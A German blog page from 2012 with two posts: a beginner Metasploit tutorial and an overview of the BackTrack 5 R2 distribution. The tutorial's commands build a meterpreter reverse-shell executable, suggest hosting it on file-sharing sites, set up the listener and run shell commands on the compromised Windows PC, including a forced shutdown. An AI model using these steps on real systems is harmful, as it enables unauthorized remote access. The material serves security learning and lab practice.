Posts mit dem Label BackTrack - Tutorials werden angezeigt. Alle Posts anzeigen
Posts mit dem Label BackTrack - Tutorials werden angezeigt. Alle Posts anzeigen

Freitag, 15. Juni 2012

Windows mit Metasploit exploiten


Hallo zusammen und herzlich willkommen zum ersten Tutorial über Backtrack. Falls Ihr vergessen haben solltet, was Backtrack ist, lest es doch hier kurz nach:

 

 
In unserem ersten Tutorial geht es darum, ein Windows – PC zu „hacken“.

Wir generieren ein .exe – File (dass aber ausser dem Exploit nichts kann), welcher bei Ausführung uns die Möglichkeit gibt, eine Windows – Shell auszuführen (CMD).

Schritt 1 – Vorbereitung

Wir benutzen BackTrack 5 R2 als ROOT – User und öffnen ein Terminal. Dort erstellen wir unsere Exe – Datei mit folgender Kommandozeile:

msfpayload windows/meterpreter/reverse_tcp lhost=Die IP des eigenen PC’s lport=4444 x > ExeFile.exe

Um die IP herauszufinden, könnt ihr bei einem anderen Terminal „ifconfig“ eingeben und unter eth0 die Adresse die nach „inet addr:“ steht eingeben.

 
Das dauert eine Weile, aber sobald Ihr folgendes seht, könnt Ihr weitermachen:

 
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
 Length: 290
Options: {"lhost"=>"DeineIP", "lport"=>"4444"}

 
Um die IP herauszufinden, könnt ihr bei einem anderen Terminal „ifconfig“ eingeben und unter eth0 die Adresse die nach „inet addr:“ steht eingeben.
Das Exe – File müsst Ihr zum Download freigeben (zB über DropBox, uploadet.to und ähnliches).

 
Schritt 2 – den Exploit starten

Öffnet ein neues Terminal und gebt „msfconsole“ ein und wartet solange bis ihr „msf  >“ seht.
Jetzt müsst Ihr den Befehl „use multi/handler“ eingeben.

Ihr solltet nun ein „msf exploit(handler) >“ sehen. 
Jetzt wählen wir „unseren“ Exploit mit „set payload windows/meterpreter/reverse_tcp“ gefolgt von „set lhost DeineIP“ und „set lport 4444“(Je auf einer eigenen Kommandozeile). 
Fertig.

 
Um den Exploit zu starten müsst Ihr jetzt einfach „exploit eingeben“ und nun wartet Ihr.
Geht mit einem anderem PC (Windows) und ladet eure Exe – Datei runter. (Funktioniert auch mit einer virtuellen Maschine)
Führt sie auf eurem Windows PC aus und wartet bis ihr „meterpreter“ seht.



 
Schritt 3 – Den Exploit ausnutzen

Nun könnt ihr „shell“ eingeben – voila ihr seid drinnen.
Einfache Befehle:

Notepad öffnen:

cd C:\
notepad.exe"/"notepad

Messagebox öffnen:

Msg * " Deine Nachricht "

PC runterfahren:

shutdown -t 0 (damit keine Möglichkeit zum Abbruch besteht)

 
Beachtet bitte:

Funktioniert nur auf nicht gepatchte Versionen von Windows, wenn keine Firewall aktiviert ist (oder Microsoft Security Essentials oder ähnliches...)


Dieses Tutorial ist nicht für illegale Zwecke gedacht, sondern um einen Einstieg im Bereich der IT – Security / PenTesting zu erleichtern.

Donnerstag, 31. Mai 2012

BackTrack 5 R2





Was ist Backtrack?

Für alle die es noch nicht Wissen:

BackTrack (englisch, zu Deutsch etwa Zurückverfolgung) ist eine von einer Live-CD, einem USB-Stick oder über ein Netzwerk bootende Linux-Distribution zur Überprüfung der Sicherheit einzelner Rechner in Netzwerken sowie der Gesamtsicherheit des Netzwerks.
Zitat Wikipedia

BackTrack ist kein Hacker - OS und ist eigentlich auch nicht für böse zwecke gedacht, es soll vielmehr IT - Sicherheitsexperten oder ähnlichen Leuten (CEH, CCISO, ENSA, LPT, CHFI etc) helfen ihre Sicherheitstests durchzuführen.
Natürlich lässt sich damit auch Blödsinn anstellen. Das ist aber illegal.

Was bringt Backtrack mit?

Benutzerfreundlichkeit

Backtrack 5 erkennt die Hardware und muss nicht wie bei Windows manuell mit Treibern versorgt     werden.
Mit 2 Commando - Zeilen bekommt man das praktische Ubuntu Software Center
( sudo apt-get install software-center und sudo apt-get install aptitude)
Eine Vielzahlt an Tools für PenTesting und Co
 


Applications > BackTrack



Von diesem Menu - Punkt aus erreicht man alle praktischen Tools die man für das Testen der Sicherheit braucht.

 Unter Internet findet man Tool wie zb EtherApe welches je nach belieben verschiedene Protokolle überwacht und so eine "Karte" der Verbindungen über des gewählten Protokolles zeichnet.

Mit Zenmap hat man ein Graphisches User Interface für das tool nmap.

Auch schön ist das bereits vorinstalierte Wine, mit welchem man .exe Dateien ausführen kann.



Fazit

Backtrack wird von vielen CEH empfohlen, um PenTesting und Co durchzuführen, es ist eine freie Linux - Distribution und kann standartmässig auch .exe - dateien dank Wine ausführen.

Da ich persönlich Linux - und EH - Fan bin kann ich dieses OS nur empfehlen, wenn man etwas sucht, womit man im Bereich der IT - Sicherheit arbeiten kann.

Wenn man hingegen nur Surfen will sind andere Systeme zu empfehlen.